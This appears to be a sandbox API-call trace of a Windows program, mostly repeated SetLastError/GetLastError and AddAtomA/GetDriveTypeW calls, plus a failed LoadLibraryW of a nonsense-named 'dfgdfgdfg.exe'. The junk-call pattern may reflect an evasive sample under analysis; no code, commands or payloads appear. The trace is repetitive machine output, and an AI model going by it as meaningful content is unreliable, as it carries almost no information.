[0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.500] SetLastError (dwErrCode=0x0) [0093.500] GetLastError () returned 0x0 [0093.500] SetLastError (dwErrCode=0x0) [0093.500] GetLastError () returned 0x0 [0093.500] SetLastError (dwErrCode=0x0) [0093.501] GetLastError () returned 0x0 [0093.501] SetLastError (dwErrCode=0x0) [0093.501] GetLastError () returned 0x0 [0093.501] SetLastError (dwErrCode=0x0) [0093.501] GetLastError () returned 0x0 [0093.501] SetLastError (dwErrCode=0x0) [0093.501] GetLastError () returned 0x0 [0093.501] SetLastError (dwErrCode=0x0) [0093.501] GetLastError () returned 0x0 [0093.501] SetLastError (dwErrCode=0x0) [0093.501] GetLastError () returned 0x0 [0093.501] SetLastError (dwErrCode=0x0) [0093.501] GetLastError () returned 0x0 [0093.501] SetLastError (dwErrCode=0x0) [0093.501] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 
[0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 
[0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 
[0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.507] SetLastError (dwErrCode=0x0) [0093.507] GetLastError () returned 0x0 
[0093.507] SetLastError (dwErrCode=0x0) [0093.507] GetLastError () returned 0x0 [0093.507] SetLastError (dwErrCode=0x0) [0093.507] GetLastError () returned 0x0 [0093.509] SetLastError (dwErrCode=0x0) [0093.509] GetLastError () returned 0x0 [0093.509] SetLastError (dwErrCode=0x0) [0093.509] GetLastError () returned 0x0 [0093.509] SetLastError (dwErrCode=0x0) [0093.510] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0093.511] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0093.511] GetLastError () returned 0x0 [0093.511] SetLastError (dwErrCode=0x0) [0093.511] GetLastError () returned 0x0 [0093.511] SetLastError (dwErrCode=0x0) [0093.511] GetLastError () returned 0x0 [0093.511] SetLastError (dwErrCode=0x0) [0093.511] GetLastError () returned 0x0 [0093.511] SetLastError (dwErrCode=0x0) [0093.511] GetLastError () returned 0x0 [0093.511] SetLastError (dwErrCode=0x0) [0093.511] GetLastError () returned 0x0 [0093.511] SetLastError (dwErrCode=0x0) [0093.511] GetLastError () returned 0x0 [0093.511] SetLastError (dwErrCode=0x0) [0093.511] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 
[0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.514] SetLastError (dwErrCode=0x0) [0093.514] GetLastError () returned 0x0 [0093.514] SetLastError (dwErrCode=0x0) [0093.514] GetLastError () returned 0x0 [0093.514] SetLastError (dwErrCode=0x0) [0093.514] GetLastError () returned 0x0 [0093.514] SetLastError (dwErrCode=0x0) [0093.514] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 
[0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.518] LoadLibraryW (lpLibFileName="dfgdfgdfg.exe") returned 0x0 [0093.518] AddAtomA (lpString=0x0) returned 0x0 [0093.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.518] AddAtomA (lpString=0x0) returned 0x0 [0093.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) 
returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) 
returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 